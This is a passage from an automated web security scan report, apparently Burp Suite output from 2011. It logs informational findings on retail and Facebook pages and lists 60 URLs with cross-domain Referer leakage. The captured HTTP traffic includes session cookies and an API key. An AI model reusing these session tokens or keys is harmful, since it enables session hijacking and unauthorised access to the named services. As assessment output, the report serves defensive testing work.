<script type="text/javascript" src="/N3821919/bundles/footer.js" ></script>

<script language="javascript">
   setCurrentDomain("bluenile.com");
</script>

</head>
<body onLoad="LoadState.onLoad();" onunload="LoadState.onUnLoad();">
   <div id="bn_page_data" style="display:none"
       data-domain="bluenile.com"
       data-site="
...[SNIP]...

Request 2

GET /accounts/account-sign-in.html HTTP/1.1
Host: secure.bluenile.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GUID=F59437BB_F744_4338_9666_F1641BDAF3E0; __utmz=1.1305510928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.637722072.1305510928.1305510928.1305510928.1; __utmc=1; __utmb=1.1.10.1305510928; testcookie=; sitetrack=jse~1; stc=3NZR3Q; bnper=ver~3&NIB~0&CURR~USD&CURR_SYM~%24&CONTEXT-NAME~53&DM~-&SUB~false; bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~0&mbpop~false; pop=sweeps~1

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 02:07:19 GMT
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
P3P: CP="NOI DSP DEVa TAIa OUR BUS UNI STA":
Set-Cookie: JSESSIONID=29327FC5A94A61637714E1448B29219F; Path=/; Secure
Set-Cookie: bnses=ver~1&ace~false&isbml~false&fbcs~true&new~false&ss~1&mbpop~false; Domain=.bluenile.com; Path=/
Set-Cookie: stc=3NZR3Q; Domain=.bluenile.com; Expires=Sat, 12-Nov-2011 02:07:21 GMT; Path=/
Set-Cookie: SID=""; Domain=.bluenile.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Vary: Accept-Encoding
Content-Length: 63219

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Your Account Sign In - Blue Nile</title>

<link rel="stylesheet" type="text/css" media="screen, print" href="/N518116487/bundles/allpages.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/N1374326862/bundles/cart.css" />
<link rel="stylesheet" type="text/css" media="print" href="/N688855944/css/cart_print.css" />
<link rel="stylesheet" type="text/css" media="screen, print" href="/984568475/css/footer.css" />

<script type="text/javascript" src="/926308692/bundles/core.js" ></script>
<script type="text/javascript" src="/N3371804/bundles/allpages.js" ></script>
<script type="text/javascript" src="/N522719515/bundles/ga.js" ></script>
<script type="text/javascript" src="/N889218490/bundles/forms.js" ></script>
<script type="text/javascript" src="/N1991330425/js/navigation_flyouts_menu.js" ></script>
<script type="text/javascript" src="/N995712186/bundles/accounts.js" ></script>
<script type="text/javascript" src="/N3821919/bundles/footer.js" ></script>

<script language="javascript">
   setCurrentDomain("bluenile.com");
</script>

</head>
<body onLoad="LoadState.onLoad();" onunload="LoadState.onUnLoad();">
   <div id="bn_page_data" style="display:none"
       data-domain="bluenile.com"
       data-site="BN"
       data-site-server-name="http://www.bluenile.com"
       data-site-secure-server-name="https://secure.bluenile.com"
       data-currencyCode=
...[SNIP]...

16.4. http://web.aisle7.net/api/1.0/widgets/general/newswire-widget previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://web.aisle7.net
Path:	/api/1.0/widgets/general/newswire-widget

Request 1

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp1305510846252 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
Referer: http://www.gnc.com/home/index.jsp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response 1

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:58:41 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 2256db7e-6ccb-4610-a30c-d415a86a3bc9
Content-Language: en-us
Hni-Response-Time-Ms: 16
Cache-Control: public
Last-Modified: Wed, 16 Feb 2011 18:25:59 GMT
Content-Type: text/javascript; charset=utf-8
Content-Length: 3726

jsonp1305510846252("\u003clink rel=\"StyleSheet\" type=\"text/css\" href=\"http://web.aisle7.net/styles/dynamic/963/10006272/enhanced.css\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/link\u003e\u003cscript type=\"text/javascript\" src=\"http://web.aisle7.net/scripts/libraries/jquery/core.js\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/script\u003e\u003cscript type=\"text/javascript\" src=\"http://web.aisle7.net/scripts/components/widgets.js\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/script\u003e\u003cscript type=\"text/javascript\" src=\"http://web.aisle7.net/scripts/libraries/jquery/plugins/jquery.threedots/jquery.threedots.js\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003c/script\u003e\u003cdiv class=\"hnie_UnstructuredBody\" xmlns=\"http://www.w3.org/1999/xhtml\"\u003e\u003cdiv class=\"hnise_Html\"\u003e\u003cdiv\u003e\u003cdiv class=\"hni_NewswireWidget\"\u003e\u003cdiv class=\"hni_NewswireLogoContainer\"\u003e\u003cimg alt=\"Newswire\" border=\"0\" src=\"http://web.aisle7.net/images/Misc/Newswire/master.k.m.us.logo.gif\"\u003e\u003c/img\u003e\u003c/div\u003e\u003cdiv class=\"hni_NewswireTargetItems\"\u003e\u003cul\u003e\u003cli class=\"hni_NewswireTargetItemFirst\"\u003e\u003ca class=\"hni_NewswireTargetItemLink\" href=\"http://www.gnc.com/shop/index.jsp?categoryId=10813502&resource=%2fassets%2ffeature%2fomega-3s-for-eye-health%2f%7edefault\"\u003eOmega-3s for Eye Health\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca class=\"hni_NewswireTargetItemLink\" href=\"http://www.gnc.com/shop/index.jsp?categoryId=10813502&resource=%2fassets%2ffeature%2frest-easier-with-melatonin-and-minerals%2f%7edefault\"\u003eRest Easier with Melatonin and Minerals\u003c/a\u003e\u003c/li\u003e\u003cli\u003e\u003ca class=\"hni_NewswireTargetItemLink\" href=\"http://www.gnc.com/shop/index.jsp?categoryId=10813502&resource=%2fassets%2ffeature%2ftried-and-true-prunes-help-keep-you-regular_14135_4%2f%7edefault\"\u003eTried and True: Prunes Help Keep You Regular\u0
...[SNIP]...

Request 2

GET /api/1.0/widgets/general/newswire-widget?apikey=00617ba4d64547b589e1e8b3dac082be&format=html&styles=enhanced&content_only=true&links=resource-path-encoded&request_handler_uri=http%3A%2F%2Fwww.gnc.com%2Fshop%2Findex.jsp%3FcategoryId%3D10813502%26resource%3D&clientscript=1&jsonpcallback=jsonp1305510846252 HTTP/1.1
Host: web.aisle7.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: aisle7c6=4090937773.1.3050751040.2686703417

Response 2

HTTP/1.1 200 OK
Date: Mon, 16 May 2011 01:59:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Hni-Request-Id: 4c9633d6-119a-4aa1-a64e-d59f06de0728
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 168

jsonp1305510846252( { isError: true, statusCode: 403, message: "Access to resource /us/widgets/general/newswire-widget is forbidden when requested from this domain"} );

16.5. http://www.facebook.com/plugins/like.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/like.php

Request 1

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.restorationhardware.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.43.123.61
X-Cnection: close
Date: Mon, 16 May 2011 01:53:22 GMT
Content-Length: 6352

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd08392ab6417f56904035" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"a8ea9e85",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"66.220.149.25",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"3-4D_",lhsh:"31bf7",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php
...[SNIP]...

Request 2

GET /plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2FRestorationHardware&layout=button_count&show_faces=false&width=188&action=like&colorscheme=light&height=35 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.42.199.65
X-Cnection: close
Date: Mon, 16 May 2011 01:53:33 GMT
Content-Length: 6316

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd0839d0ac033d60843924" class="connect_widget button_count" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider"><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center connect_widget_confirm_cell"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_button_count_including hidden_elem"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="thumbs_up hidden_elem"></div></td><td><div class="undo hidden_elem"></div></td></tr><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td><td class="connect_widget_button_count_excluding"><table class="uiGrid" cellspacing="0" cellpadding="0"><tbody><tr><td><div class="connect_widget_button_count_nub"><s></s><i></i></div></td><td><div class="connect_widget_button_count_count">24K</div></td></tr></tbody></table></td></tr></table></div></div><script type="text/javascript">
Env={module:"like_widget",impid:"f8ea197d",user:0,locale:"en_US",method:"GET",start:(new Date()).getTime(),ps_limit:5,ps_ratio:4,svn_rev:378427,vip:"66.220.149.25",static_base:"http:\/\/static.ak.fbcdn.net\/",www_base:"http:\/\/www.facebook.com\/",rep_lag:2,fb_dtsg:"3-4D_",lhsh:"31bf7",tracking_domain:"http:\/\/pixel.facebook.com",retry_ajax_on_network_error:"1",ajaxpipe_enabled:"1",no_cookies:1};
</script>
<script type="text/javascript">Bootloader.setResourceMap({"J324q":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php\/v1\/yh\/r\/HD3OAbjOVTn.css"},"V02Ya":{"type":"css","permanent":1,"src":"http:\/\/static.ak.fbcdn.net\/rsrc.php
...[SNIP]...

16.6. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Request 1

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.petco.com/?AID=10413444&PID=2537521&cm_mmc=CJ-_-CID-_-2537521-_-10413444
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 1

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.86.49
X-Cnection: close
Date: Mon, 16 May 2011 01:59:12 GMT
Content-Length: 9048

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd084f076b987d77497592" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>PETCO</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">188,197</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a>
...[SNIP]...

Request 2

GET /plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Fpetco&width=185&colorscheme=light&connections=0&stream=false&header=false&height=63 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: datr=3GHNTeTln1shCRlV4nyEfKsc

Response 2

HTTP/1.1 200 OK
Cache-Control: private, no-cache, no-store, must-revalidate
Expires: Sat, 01 Jan 2000 00:00:00 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.54.69.27
X-Cnection: close
Date: Mon, 16 May 2011 01:59:46 GMT
Content-Length: 8964

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" id="facebook" class=
...[SNIP]...
<div id="connect_widget_4dd085123f7899594634148" class="connect_widget" style=""><table class="connect_widget_interactive_area"><tr><td class="connect_widget_vertical_center connect_widget_button_cell"><div class="connect_button_slider" style=""><div class="connect_button_container"><a class="connect_widget_like_button clearfix like_button_no_like"><div class="tombstone_cross"></div><span class="liketext">Like</span></a></div></div></td><td class="connect_widget_vertical_center"><span class="connect_widget_confirm_span hidden_elem"><a class="mrm connect_widget_confirm_link">Confirm</a></span></td><td class="connect_widget_vertical_center"><div class="connect_confirmation_cell connect_confirmation_cell_no_like"><div class="connect_widget_text_summary connect_text_wrapper"><span class="connect_widget_user_action connect_widget_text hidden_elem">You like <b>PETCO</b>.<span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a></span></span><span class="connect_widget_summary connect_widget_text"><span class="connect_widget_connected_text hidden_elem">You like this.</span><span class="connect_widget_not_connected_text">188,198</span><span class="unlike_span hidden_elem"><a class="connect_widget_unlike_link"></a></span><span class="connect_widget_admin_span hidden_elem"> · <a class="connect_widget_admin_option">Admin Page</a><span class="connect_widget_insights_span hidden_elem"> · <a class="connect_widget_insights_link">Insights</a></span></span><span class="connect_widget_error_span hidden_elem"> · <a class="connect_widget_error_text">Error</a>
...[SNIP]...

16.7. https://www.guitarcenter.com/MyAccount/Login.aspx previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	https://www.guitarcenter.com
Path:	/MyAccount/Login.aspx

Request 1

Response 1

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:11:39 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 32
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="ctl00__htmHead"><script language="javascript">

var NTPT_PGEXTRA='source=&PageName=Guitar%20Center%3ASign%20In%20or%20New%20Account';

</script>
<script src="/Includes/Common/Scripts/Header.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/JBSPopup.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/ProductPop.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/mbox.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/header.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/ntpagetag.js" type="text/javascript"></script><title>
GuitarCenter
</title><meta name="verify-v1" content="xm3ZwFRUWeh1YYkqPGOiWCI8zzpbBloCC+YVitoIe50=" /><meta name="y_key" content="f1dda75749288e44" /><link id="ctl00_Favicon" rel="SHORTCUT ICON" href="/includes/GuitarCenter/images/favicon.ico" /><link href="/Includes/GuitarCenter/CSS/GCFooter.css" rel="stylesheet" type="text/css" /><link type="text/css" rel="stylesheet" href="/includes/guitarcenter/GuitarCenter.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<link type="text/css" rel="stylesheet" href="/Includes/guitarcenter/css/colorbox.css" />
<script src="/includes/guitarcenter/scripts/json2.js" type="text/javascript"></script>
<script src="/includes/guitarcenter/scripts/jquery.colorbox-min.js" type="text/javascript"></script>

<!--[if IE 8]>
<link href="/Includes/GuitarCenter/CSS/GCIE8Footer.css" rel="stylesheet" type="text/css" />
<![endif]--
...[SNIP]...

Request 2

GET /MyAccount/Login.aspx?goto=%2fMyAccount%2fDefault.aspx HTTP/1.1
Host: www.guitarcenter.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.68 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=lwhsuvawhj2nga0zihmkuetv; uid=63077232-5a8c-4dcd-b23d-e9787a0b3e86; ref=; ref_d=5/15/2011 9:40:10 PM; ad_id=; orig_ref=; orig_ref_d=5/15/2011 9:40:10 PM; orig_source=4ACJWXX2; orig_ad_id=; IsLoyaltyAvailable=False; NISess=1; UnicaNIODID=XnP5ihHP0wn-W9BZAUV; CjPID=2537521; CjAID=10453836; source=4ACJWXX2; UNICASOURCE=4ACJWXX2-4ACJWXX2; UNICASOURCEL=4ACJWXX2-4ACJWXX2; mbox=session#1305510019406-714170#1305512679|PC#1305510019406-714170.17#1308102819|check#true#1305510879; s_cc=true; s_sq=mfgclive%2Cmfglobal%3D%2526pid%253Dhttp%25253A//www.guitarcenter.com/%25253FCJAID%25253D10453836%252526CJPID%25253D2537521%2526oid%253Dhttp%25253A//www.guitarcenter.com/MyAccount/Default.aspx%2526ot%253DA; fcspersisthp-slider=5

Response 2

HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 16 May 2011 02:12:05 GMT
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
SN: 43
X-Powered-By: ASP.NET
Set-Cookie: UNICASOURCE=4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 02:12:05 GMT; path=/
Set-Cookie: UNICASOURCEL=4ACJWXX2-4ACJWXX2-4ACJWXX2; expires=Mon, 30-May-2011 02:12:05 GMT; path=/
Vary: Accept-Encoding
Content-Length: 27444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<head id="ctl00__htmHead"><script language="javascript">

var NTPT_PGEXTRA='source=&PageName=Guitar%20Center%3ASign%20In%20or%20New%20Account';

</script>
<script src="/Includes/Common/Scripts/Header.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/JBSPopup.js" type="text/javascript"></script><script src="/Includes/Common/Scripts/ProductPop.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/mbox.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/header.js" type="text/javascript"></script><script src="/Includes/GuitarCenter/Scripts/ntpagetag.js" type="text/javascript"></script><title>
GuitarCenter
</title><meta name="verify-v1" content="xm3ZwFRUWeh1YYkqPGOiWCI8zzpbBloCC+YVitoIe50=" /><meta name="y_key" content="f1dda75749288e44" /><link id="ctl00_Favicon" rel="SHORTCUT ICON" href="/includes/GuitarCenter/images/favicon.ico" /><link href="/Includes/GuitarCenter/CSS/GCFooter.css" rel="stylesheet" type="text/css" /><link type="text/css" rel="stylesheet" href="/includes/guitarcenter/GuitarCenter.css" />
<script src="//ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js" type="text/javascript"></script>
<link type="text/css" rel="stylesheet" href="/Includes/guitarcenter/css/colorbox.css" />
<script src="/includes/guitarcenter/scripts/json2.js" type="text/javascript"></script>
<script src="/includes/guitarcenter/scripts/jquery.colorbox-min.js" type="text/javascript"></script>
<!--[if lte IE 7]>
<link href="/Includes/GuitarCenter/CS
...[SNIP]...

17. Cross-domain Referer leakage previous next
There are 60 instances of this issue:

http://american.redcross.org/site/PageServer
http://bp.specificclick.net/
http://bp.specificclick.net/
http://bp.specificclick.net/
http://buy.travelguard.com/TGI2/proc/stateselector.aspx
http://cm.g.doubleclick.net/pixel
http://dms.netmng.com/si/CM/Tracking/ClickTracking.aspx
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://fls.doubleclick.net/activityi
http://hire.jobvite.com/CompanyJobs/Careers.aspx
http://html.aggregateknowledge.com/iframe
https://secure.homedepot.ca/webapp/wcs/stores/servlet/UserRegistrationForm
https://secure.orientaltrading.com/ui/userProfile/processRequest.do
http://t.p.mybuys.com/webrec/wr.do
http://t.p.mybuys.com/webrec/wr.do
http://t.p.mybuys.com/webrec/wr.do
http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx
http://track.searchignite.com/si/CM/Tracking/ClickTracking.aspx
http://www.acehardware.com/category/index.jsp
http://www.acehardware.com/home/index.jsp
http://www.acehardware.com/home/index.jsp
https://www.acehardware.com/checkout/index.jsp
http://www.bhphotovideo.com/bnh/controller/home
http://www.bluefly.com/myfly/login.jsp
http://www.bluenile.com/build-your-own-diamond-ring
http://www.bluenile.com/engagement-rings
http://www.brookstone.com/floating-daybed-with-canopy-pool-lounger.html
http://www.brookstone.com/outdoor-living.html
https://www.brookstone.com/formhandlerservlet
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/like.php
http://www.facebook.com/plugins/likebox.php
https://www.footlocker.com/account/default.cfm
http://www.gnc.com/home/index.jsp
https://www.gnc.com/checkout/index.jsp
http://www.guitarcenter.com/
https://www.guitarcenter.com/MyAccount/Login.aspx
https://www.helzberg.com/account/login.do
http://www.homedepot.ca/webapp/wcs/stores/servlet/Home
http://www.imiclk.com/cgi/r.cgi
http://www.imiclk.com/cgi/r.cgi
http://www.imiclk.com/cgi/r.cgi
http://www.imiclk.com/cgi/r.cgi
http://www.petco.com/
http://www.petco.com/Secure/Login.aspx
http://www.petsmart.com/
https://www.petsmart.com/checkout/index.jsp
http://www.redcrossstore.org/Shopper/Product.aspx
http://www.redcrossstore.org/dp.aspx
http://www.redcrossstore.org/shopper/prodlist.aspx
https://www.redcrossstore.org/dp.aspx
http://www.restorationhardware.com/content/promo.jsp
https://www.restorationhardware.com/my-account/sign-in.jsp
http://www.siteadvisor.com/download/windows.html
http://www.toshibadirect.com/td/b2c/laptops.to
http://www.toshibadirect.com/td/b2c/laptops.to

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

